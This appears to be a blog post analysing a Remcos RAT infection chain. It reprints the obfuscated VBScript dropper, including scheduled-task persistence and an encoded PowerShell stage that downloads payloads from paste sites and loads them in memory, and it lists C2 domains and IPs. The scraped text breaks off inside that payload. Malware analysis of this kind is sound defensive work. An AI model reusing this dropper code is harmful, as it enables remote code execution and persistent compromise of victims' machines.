Link to the artifacts from this investigation can be found over at my Github here<\/a> which also includes the output from the two URLs seen in the VB script. The memory dump of the Remcos process can be found here<\/a> instead.<\/p>\n Based on initial investigation, the VB script was downloaded directly from hxxps:\/\/hidrive[.]ionos[.]com\/lnk\/SBBJoDne#file with no referrer or anything of the sort. Once the file is executed the following process tree can be seen.<\/p>\n Looking at what was inside this VB script file, initially there seems to be a lot of noise\/garbage as one would expect.<\/p>\n Once the script was cleaned up using CyberChef and the unique<\/strong> recipe, this is what was left.<\/p>\n Quickly looking at the remains of the script and just checking the different variables here and there, it looks like the actual script is just the below part.<\/p>\n NOTE:<\/strong> I am not fluent in the way of coding\/scripting, so I could be very off the mark here. If so, please let me know.<\/p>\n So running through the script it seems that the initial section sets up:<\/p>\n Further down there is a block of what appears to base64 encoded text with an additional character added in to it. The hint\u00a0 that this is a base64 string is due to the below line which is also replacing the additional character of ‘\ufffd%’ with an ‘A’:<\/p>\n The following is the base64 block decoded using CyberChef once again.<\/p>\n Ok cool. So if I am doing the deobfuscation correctly here, the bottom half of the script looks like this.<\/p>\n <\/p>\n So the first URL that is listed (hxxps:\/\/textbin[.]net\/raw\/ezjmofz3s6) is a redirect (see the urlscan here<\/a>) and goes to hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR. I could not get the TXT file from URLScan as seen here<\/a>, so I ended up using Any.Run<\/a> to get the file, and then later using pasteio.com<\/a> to decode the URL to get the same identical file that I got from Any.Run. The file obtained from hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR was the following:<\/p>\n which decoded from base64 looks to be a binary file (the hash<\/a> for this file was not found on VT).<\/p>\n A quick look at this file saved from CyberChef with strings was interesting but not fruitful per se. The output showed that there were references to both\u00a0<\/strong>‘Maracaibo’ and ‘MsqBIbY’, but nothing else really. This told me that I would have to take a look at this file in dnSpy to see what was really going on.<\/p>\n Moving further down on the script where the other URL is located – it looked to be some API calls that I have not seen before (or at least that I can remember), in particular ‘[system.AppDomain]::CurrentDomain.Load’,\u00a0 ‘GetType’, ‘GetMethod’, and ‘Invoke’. A quick Google of ‘[system.AppDomain]::CurrentDomain.Load’ I was able to find this Microsoft page<\/a> giving some insight into what the API calls where doing in the script. The crux of this looked to be loading and running some code in memory.<\/p>\n I also come across some other links from Fortinet back in 2021 that went over what looks to be a similar tatic for some malspam that delivered Agent Tesla back then.<\/p>\n Fortinet discussed the code above being leveraged for process hallowing which makes sense considering the different API calls being made. It made even more sense since one of the alerts from the initial VB script was for a process injection using ‘Regsvcs.exe’.<\/p>\n So now knowing that there is some level of memory shenanigans going on here, it was time to see what goodies the other URL (hxxps:\/\/paste[.]ee\/d\/WRBwK\/0) had.<\/p>\n Using curl for the URL the hxxps:\/\/paste[.]ee\/d\/WRBwK\/0 URL gave me back the following:<\/p>\n which then I promptly put into CyberChef. CyberChef decided not to give me back anything useful and the issues that I had with recipe was flawed. Thankfully @kaspertame<\/a> threw me a life line and helped correct my mis-step. The issues here were because:<\/p>\n Once I got things figured out in CyberChef, I was able to download the binary and cross check the hash on VT<\/a> to see if it was a known hash – which it definitely was.<\/p>\n I also did the same thing that I did with the other one and used strings to see what I could gather quickly from that output. Pretty quickly the strings output gave up some great details – especially the fact that someone was really<\/strong><\/em> proud of this being Remcos.<\/p>\n Doing a couple of quick grep searches with strings was pretty interesting as well.<\/p>\n Switching gears, I moved the two files that I was able to pull down from the two URLs seen in the script on to my VM. Opening the first file from the pasteio.com<\/strong> site using dnSPy and looking for ‘Maracaibo.Class1’ and the method ‘MsqBIbY’ gave all kinds of great information. Information that I could make educated assumptions about (ie: seeing the code for what I can only assume is the reverse function for the second URL as seen below, hence why it was not included in the script), but nothing that I could really dig further into due to the lack of skills here.<\/p>\n As a side note: <\/strong>@IzzyBoopFPV<\/a> pointed out to me when we were talking about this, “das sum sussy baka shit right there [sic]”.<\/p>\n With the other binary downloaded from the\u00a0paste.ee<\/strong> URL, I did not see anything there unfortunately within dnSpy. I did run it through Capa<\/a> and got the following back from it.<\/p>\n I exported these files and have included them in the Github repo<\/a> for this investigation for anyone that wants to take a crack at them.<\/p>\n Now that the files have been obtained and I have a good idea of what is going on via the script and what to look for, it was time to see what happened when actually running it in my VM and what happened at the network layer.<\/p>\n The first attempt was done using the script as that seemed like the path of least resistance. Unfortunately this was not the case and the script bombed out. Looking at Wireshark I could see the calls made by the script to the two URLs, but I ended up getting a reset back from the hosts (not shown here) which was the end of that.<\/p>\n Next up was running the binary files themselves starting with the binary from pasteio.com<\/strong>. As soon as I executed the file, MS AV popped up and let me know that it had stopped the execution of something bad even though MAV was disabled for real-time scanning. Looking at ProcMon and filtering for any created<\/strong> or\u00a0ended<\/strong> processes I could see that as soon as it was created it ended.<\/p>\n Looking at Wireshark this time gave me a small surprise – two outbound calls for the following domains not seen before:<\/p>\n Taking this and cross-referencing against Sysmon logs I was able to validate that the binary from pasteio.com made the calls.<\/p>\n Since I didn’t get much from the pasteio.exe binary, I switched to the binary from the paste.ee<\/strong> domain and ran that. This time the activity within the VM was much more promising. I got the same call outs to the two domains listed above, but also a small stream of traffic to the rds[.]accesscam[.]org domain (178[.]237[.]33[.]50) on port 6620 as seen in the conversations below.<\/p>\n Note: <\/strong>As a side, the port 6620 looks to be related to tcp\/kftp-data.\u00a0<\/span><\/p>\n The only thing that I can assume on the network level is that the communication between the VM and port 6620 is dormant and nothing is really going on (almost like a heart beat) and that the VM is waiting for commands from the server. I also checked both Shodan<\/a> and Censys<\/a> to see if this port was seen at either place and neither had any information about this port. Granted using netcat (nc -v rdm.accesscam.org 6620) from terminal told me that I had connected successfully. So who knows.<\/p>\n Now considering the binary did not need to use the process hollowing technique to run on the system, the persistence mechanism was not created. When doing a quick scan of the registry and filesystem for anything modified\/created by the process, the anything that I saw was the binary playing with the registry and NOTHING on on the filesystem:<\/p>\n Also looking at the Sysmon events again I did not see anything else that stood out with what I saw mentioned above.<\/p>\n The last thing that I wanted to attempt was to pull the config out of the binary since based on others (ie: Jai<\/a>‘s most excellent post about this very thing which can be read here<\/a>) it looked pretty easy to do. In this case it took a couple of tries (which I am still not sure how I messed up since the working one looked like the others), but I did finally manage to pull it out.<\/p>\n URL: hxxps:\/\/hidrive[.]ionos.com\/lnk\/SBBJoDne#file [VT] [URLHaus] Summary ========= The last time I “published” anything was about a 1.8 years or so ago. So in the spirit of New Years resolutions to myself it really has come time for me to get back on the horse and get back into some sort of posting again. So let’s jump into an alert that I came across for what looks to be Remcos RAT. Link to the artifacts from this investigation can be found over at my Github here which also includes the output from the two URLs seen in the VB script. The memory dump of the Remcos…<\/p>\nInitial Analysis
\n=============<\/h4>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-886x1024.png\")
<\/a><\/p>\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n'that qxtjb enables JoYB.\r\nFunction OoUrkN(qxtjb, UHnWO)\r\n\r\nOn Error Resume Next\r\n\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\n\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\n\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\n\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\n\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nOn Error Resume Next\r\nif 0 then\r\nSet objShell = CreateObject("WScript.Shell")\r\n\r\nzoologico = "MinhaTarefaVBScript"\r\n\r\neCoeCoeCoeCo = "schtasks \/delete \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/f"\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\n\r\nstrScriptPath = WScript.ScriptFullName\r\n\r\nstrTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")\r\n\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp; "\\SeuScript.vbs"\r\n\r\n' Cria um objeto FileSystemObject\r\nSet objFSO = CreateObject("Scripting.FileSystemObject")\r\n\r\nOn Error Resume Next\r\n' Tenta copiar o arquivo para a pasta tempor?ria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;lt;&amp;amp;amp;amp;gt; 0 Then\r\nMsgBox "Erro ao copiar o arquivo para a pasta tempor?ria: " &amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\n\r\nstrCreateCommand = "schtasks \/create \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/tr """ &amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp; """ \/sc minute \/mo 1"\r\nobjShell.Run strCreateCommand, 0, True\r\n\r\nend if\r\nOn Error Resume Next\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\nOn Error Resume Next\r\n\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\n\r\ndim ARmxU \r\nARmxU = WScript.ScriptFullName\r\n\r\nHwxcO = ("J?%Bl?%G8?%a?%Bl?%HE?%I?%?%9?%C?%?%Jw?%w?%DM?%Jw?%7?%CQ?%cgBk?%GE?%dQBu?%C?%?%PQ?%g?%Cc?%JQBw?%Ho?%QQBj?%E8?%ZwBJ?%G4?%TQBy?%CU?%Jw?%7?%Fs?%QgB5?%HQ?%ZQBb?%F0?%XQ?%g?%CQ?%Z?%Bo?%Gc?%b?%Bs?%C?%?%PQ?%g?%Fs?%cwB5?%HM?%d?%Bl?%G0?%LgBD?%G8?%bgB2?%GU?%cgB0?%F0?%Og?%6?%EY?%cgBv?%G0?%QgBh?%HM?%ZQ?%2?%DQ?%UwB0?%HI?%aQBu?%Gc?%K?%?%g?%Cg?%TgBl?%Hc?%LQBP?%GI?%agBl?%GM?%d?%?%g?%E4?%ZQB0?%C4?%VwBl?%GI?%QwBs?%Gk?%ZQBu?%HQ?%KQ?%u?%EQ?%bwB3?%G4?%b?%Bv?%GE?%Z?%BT?%HQ?%cgBp?%G4?%Zw?%o?%C?%?%K?%BO?%GU?%dw?%t?%E8?%YgBq?%GU?%YwB0?%C?%?%TgBl?%HQ?%LgBX?%GU?%YgBD?%Gw?%aQBl?%G4?%d?%?%p?%C4?%R?%Bv?%Hc?%bgBs?%G8?%YQBk?%FM?%d?%By?%Gk?%bgBn?%Cg?%JwBo?%HQ?%d?%Bw?%HM?%Og?%v?%C8?%d?%Bl?%Hg?%d?%Bi?%Gk?%bg?%u?%G4?%ZQB0?%C8?%cgBh?%Hc?%LwBl?%Ho?%agBt?%G8?%ZgB6?%DM?%cw?%2?%Cc?%KQ?%g?%Ck?%I?%?%p?%Ds?%WwBz?%Hk?%cwB0?%GU?%bQ?%u?%EE?%c?%Bw?%EQ?%bwBt?%GE?%aQBu?%F0?%Og?%6?%EM?%dQBy?%HI?%ZQBu?%HQ?%R?%Bv?%G0?%YQBp?%G4?%LgBM?%G8?%YQBk?%Cg?%J?%Bk?%Gg?%ZwBs?%Gw?%KQ?%u?%Ec?%ZQB0?%FQ?%eQBw?%GU?%K?%?%n?%E0?%YQBy?%GE?%YwBh?%Gk?%YgBv?%C4?%QwBs?%GE?%cwBz?%DE?%Jw?%p?%C4?%RwBl?%HQ?%TQBl?%HQ?%a?%Bv?%GQ?%K?%?%n?%E0?%cwBx?%EI?%SQBi?%Fk?%Jw?%p?%C4?%SQBu?%HY?%bwBr?%GU?%K?%?%k?%G4?%dQBs?%Gw?%L?%?%g?%Fs?%bwBi?%Go?%ZQBj?%HQ?%WwBd?%F0?%I?%?%o?%Cc?%M?%?%v?%Es?%dwBC?%FI?%Vw?%v?%GQ?%LwBl?%GU?%LgBl?%HQ?%cwBh?%H?%?%Lw?%v?%Do?%cwBw?%HQ?%d?%Bo?%Cc?%I?%?%s?%C?%?%J?%By?%GQ?%YQB1?%G4?%I?%?%s?%C?%?%JwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%LQ?%t?%C0?%LQ?%t?%C0?%LQ?%n?%Cw?%I?%?%k?%GU?%bwBo?%GU?%cQ?%s?%C?%?%Jw?%x?%Cc?%L?%?%g?%Cc?%UgBv?%GQ?%YQ?%n?%C?%?%KQ?%p?%Ds?%")\r\n\r\ndim waalb\r\n\r\nwaalb = ("$dgUdYL = '") &amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp; "'" \r\nwaalb = waalb &amp;amp;amp;amp;amp; ";$KByHL = [system.Text.Encoding]::Unicode.GetString( "\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n'that qxtjb enables JoYB.\r\nFunction OoUrkN(qxtjb, UHnWO)\r\n\r\nOn Error Resume Next\r\n\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\n\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\n\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\n\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\n\r\n\r\n\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n<\/pre>\n\r\n'Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n'that qxtjb enables JoYB.\r\n\r\nFunction OoUrkN(qxtjb, UHnWO)\r\nOn Error Resume Next\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n'Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\n\r\nFunction xOdtc(DgWuA)\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nxOdtc = OWOhO\r\n\r\nOn Error Resume Next\r\nif 0 then\r\n\r\nSet objShell = CreateObject("WScript.Shell")\r\nzoologico = "MinhaTarefaVBScript"\r\neCoeCoeCoeCo = "schtasks \/delete \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/f"\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\nstrScriptPath = WScript.ScriptFullName\r\nstrTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp; "\\SeuScript.vbs"\r\n' Cria um objeto FileSystemObject\r\nSet objFSO = CreateObject("Scripting.FileSystemObject")\r\nOn Error Resume Next\r\n' Tenta copiar o arquivo para a pasta tempor\ufffdria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;lt;&amp;amp;amp;amp;gt; 0 Then\r\nMsgBox "Erro ao copiar o arquivo para a pasta tempor\ufffdria: " &amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\nstrCreateCommand = "schtasks \/create \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/tr """ &amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp; """ \/sc minute \/mo 1"\r\nobjShell.Run strCreateCommand, 0, True\r\nend if\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\ndim ARmxU \r\nARmxU = WScript.ScriptFullName\r\nHwxcO = ("J\ufffd%Bl\ufffd%G8\ufffd%a\ufffd%Bl\ufffd%HE\ufffd%I\ufffd%\ufffd%9\ufffd%C\ufffd%\ufffd%Jw\ufffd%w\ufffd%DM\ufffd%Jw\ufffd%7\ufffd%CQ\ufffd%cgBk\ufffd%GE\ufffd%dQBu\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Cc\ufffd%JQBw\ufffd%Ho\ufffd%QQBj\ufffd%E8\ufffd%ZwBJ\ufffd%G4\ufffd%TQBy\ufffd%CU\ufffd%Jw\ufffd%7\ufffd%Fs\ufffd%QgB5\ufffd%HQ\ufffd%ZQBb\ufffd%F0\ufffd%XQ\ufffd%g\ufffd%CQ\ufffd%Z\ufffd%Bo\ufffd%Gc\ufffd%b\ufffd%Bs\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Fs\ufffd%cwB5\ufffd%HM\ufffd%d\ufffd%Bl\ufffd%G0\ufffd%LgBD\ufffd%G8\ufffd%bgB2\ufffd%GU\ufffd%cgB0\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EY\ufffd%cgBv\ufffd%G0\ufffd%QgBh\ufffd%HM\ufffd%ZQ\ufffd%2\ufffd%DQ\ufffd%UwB0\ufffd%HI\ufffd%aQBu\ufffd%Gc\ufffd%K\ufffd%\ufffd%g\ufffd%Cg\ufffd%TgBl\ufffd%Hc\ufffd%LQBP\ufffd%GI\ufffd%agBl\ufffd%GM\ufffd%d\ufffd%\ufffd%g\ufffd%E4\ufffd%ZQB0\ufffd%C4\ufffd%VwBl\ufffd%GI\ufffd%QwBs\ufffd%Gk\ufffd%ZQBu\ufffd%HQ\ufffd%KQ\ufffd%u\ufffd%EQ\ufffd%bwB3\ufffd%G4\ufffd%b\ufffd%Bv\ufffd%GE\ufffd%Z\ufffd%BT\ufffd%HQ\ufffd%cgBp\ufffd%G4\ufffd%Zw\ufffd%o\ufffd%C\ufffd%\ufffd%K\ufffd%BO\ufffd%GU\ufffd%dw\ufffd%t\ufffd%E8\ufffd%YgBq\ufffd%GU\ufffd%YwB0\ufffd%C\ufffd%\ufffd%TgBl\ufffd%HQ\ufffd%LgBX\ufffd%GU\ufffd%YgBD\ufffd%Gw\ufffd%aQBl\ufffd%G4\ufffd%d\ufffd%\ufffd%p\ufffd%C4\ufffd%R\ufffd%Bv\ufffd%Hc\ufffd%bgBs\ufffd%G8\ufffd%YQBk\ufffd%FM\ufffd%d\ufffd%By\ufffd%Gk\ufffd%bgBn\ufffd%Cg\ufffd%JwBo\ufffd%HQ\ufffd%d\ufffd%Bw\ufffd%HM\ufffd%Og\ufffd%v\ufffd%C8\ufffd%d\ufffd%Bl\ufffd%Hg\ufffd%d\ufffd%Bi\ufffd%Gk\ufffd%bg\ufffd%u\ufffd%G4\ufffd%ZQB0\ufffd%C8\ufffd%cgBh\ufffd%Hc\ufffd%LwBl\ufffd%Ho\ufffd%agBt\uf